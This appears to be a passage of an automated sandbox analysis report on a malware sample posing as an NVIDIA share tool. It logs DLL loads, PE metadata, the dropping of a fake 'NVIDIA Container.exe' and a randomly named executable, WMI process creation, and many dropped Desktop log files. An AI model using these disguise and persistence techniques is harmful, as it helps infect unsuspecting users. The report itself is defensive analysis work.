Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: apphelp.dll

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: NVIDIAShare.exe.bin.exe

Static file information: File size 2356395 > 1048576

Source: NVIDIAShare.exe.bin.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: NVIDIAShare.exe.bin.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: NVIDIAShare.exe.bin.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: NVIDIAShare.exe.bin.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: NVIDIAShare.exe.bin.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: NVIDIAShare.exe.bin.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: NVIDIAShare.exe.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: NVIDIAShare.exe.bin.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: NVIDIAShare.exe.bin.exe
Source:	Binary string: System.Windows.Forms.pdb source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2161092207.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2892138201.000000001B460000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2306608132.000000001B4B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7..pDb source: NVIDIA Container.exe, 00000005.00000002.2129474262.00007FF8493E0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2306608132.000000001B4B5000.00000004.00000020.00020000.00000000.sdmp

Source: NVIDIAShare.exe.bin.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: NVIDIAShare.exe.bin.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: NVIDIAShare.exe.bin.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: NVIDIAShare.exe.bin.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: NVIDIAShare.exe.bin.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

File created: C:\Users\user\AppData\Roaming\NVIDIA\__tmp_rar_sfx_access_check_4291421

Jump to behavior

Source: NVIDIAShare.exe.bin.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0101F640 push ecx; ret	0_2_0101F653
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0101EB78 push eax; ret	0_2_0101EB96
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Code function: 5_2_00007FF8490C22B3 push eax; retf	5_2_00007FF8490C22B7
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Code function: 5_2_00007FF849172025 push E8FFFE49h; retf	5_2_00007FF849172031
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Code function: 5_2_00007FF8491762CA push eax; ret	5_2_00007FF8491762CD
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF848F4C8A6 push esi; retf	12_2_00007FF848F4C8A7
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF848F4C4AB push ecx; iretd	12_2_00007FF848F4C4AC
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF848F2C5A0 push es; iretd	12_2_00007FF848F2C5A7
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF8490E6299 push edx; ret	12_2_00007FF8490E62CB
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF8490C22B3 push eax; retf	12_2_00007FF8490C22B7
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF849172025 push E8FFFE49h; retf	12_2_00007FF849172031
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF8491762CA push eax; ret	12_2_00007FF8491762CD
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 14_2_00007FF848F4C8A6 push esi; retf	14_2_00007FF848F4C8A7
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 14_2_00007FF848F4C4AB push ecx; iretd	14_2_00007FF848F4C4AC
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 14_2_00007FF848F2349C push E8FFFFFFh; retf	14_2_00007FF848F234A1
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 14_2_00007FF848F2C5A0 push es; iretd	14_2_00007FF848F2C5A7
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 19_2_00007FF848F2C5A0 push es; iretd	19_2_00007FF848F2C5A7
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 19_2_00007FF848F4C8A6 push esi; retf	19_2_00007FF848F4C8A7
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 19_2_00007FF848F4C4AB push ecx; iretd	19_2_00007FF848F4C4AC
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 19_2_00007FF848F2349C push E8FFFFFFh; retf	19_2_00007FF848F234A1
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 21_2_00007FF8490E22B3 push eax; retf	21_2_00007FF8490E22B7
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 21_2_00007FF8491962CA push eax; ret	21_2_00007FF8491962CD
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 21_2_00007FF849192028 push E8FFFE49h; retf	21_2_00007FF849192031
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF848F4C8A6 push esi; retf	26_2_00007FF848F4C8A7
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF848F4C4AB push ecx; iretd	26_2_00007FF848F4C4AC
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF848F2C5A0 push es; iretd	26_2_00007FF848F2C5A7
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF8490C22B3 push eax; retf	26_2_00007FF8490C22B7
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF8490E6299 push edx; ret	26_2_00007FF8490E62CB
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF849172025 push E8FFFE49h; retf	26_2_00007FF849172031
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF8491762CA push eax; ret	26_2_00007FF8491762CD

Source: NVIDIA Container.exe.0.dr	Static PE information: section name: .text entropy: 7.545779635651326
Source: hBoBqOIwjXsCbkOMEKwZ.exe.5.dr	Static PE information: section name: .text entropy: 7.545779635651326

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\HbFMikPW.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File created: C:\Users\user\Desktop\AVNUZtIi.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\UCVIiXUm.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\fjyPCrNn.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\NBjcEgcI.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\OOMCloya.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\XOysNJXm.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\TMLKnwYz.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\PszJebvu.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\TxJtcnQc.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\DaiMBcDs.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File created: C:\Users\user\Desktop\ShoatPdx.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\hxRHxlcT.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\zwfUdEOY.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\VAeASPIF.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\JOqdsLLu.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\DSPMVDWa.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\JesvDTTS.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\chLhgIIs.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\oSRflUSV.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\xYhnoKfH.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\JfykNhTG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\pAbpDGmk.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\skLfaCLK.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\TAxSAtpp.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\AAjFTaDk.log	Jump to dropped file
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	File created: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\snUoPbCy.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\CTevJfQr.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File created: C:\Users\user\Desktop\IyVKJmYP.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\gzqzblNZ.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\qiYwETGO.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\ukwwlbRt.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\IMSbQhuH.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\cjQhkVuX.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\BlhnJSvN.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\LxmktYfY.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File created: C:\Users\user\Desktop\GwjbnDUU.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\XwgSVREI.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\AOEnQqnj.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\DnVLkBOS.log	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File created: C:\Users\user\Desktop\GwjbnDUU.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File created: C:\Users\user\Desktop\ShoatPdx.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File created: C:\Users\user\Desktop\IyVKJmYP.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	File created: C:\Users\user\Desktop\AVNUZtIi.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\UCVIiXUm.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\DnVLkBOS.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\JfykNhTG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\zwfUdEOY.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\qiYwETGO.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\LxmktYfY.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\CTevJfQr.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\skLfaCLK.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\PszJebvu.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\cjQhkVuX.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\TAxSAtpp.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\IMSbQhuH.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\chLhgIIs.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\oSRflUSV.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\fjyPCrNn.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\VAeASPIF.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\snUoPbCy.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\NBjcEgcI.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\DSPMVDWa.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\ukwwlbRt.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\xYhnoKfH.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\XwgSVREI.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\OOMCloya.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\DaiMBcDs.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\gzqzblNZ.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\AOEnQqnj.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\hxRHxlcT.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\XOysNJXm.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	File created: C:\Users\user\Desktop\pAbpDGmk.log	Jump to dropped file
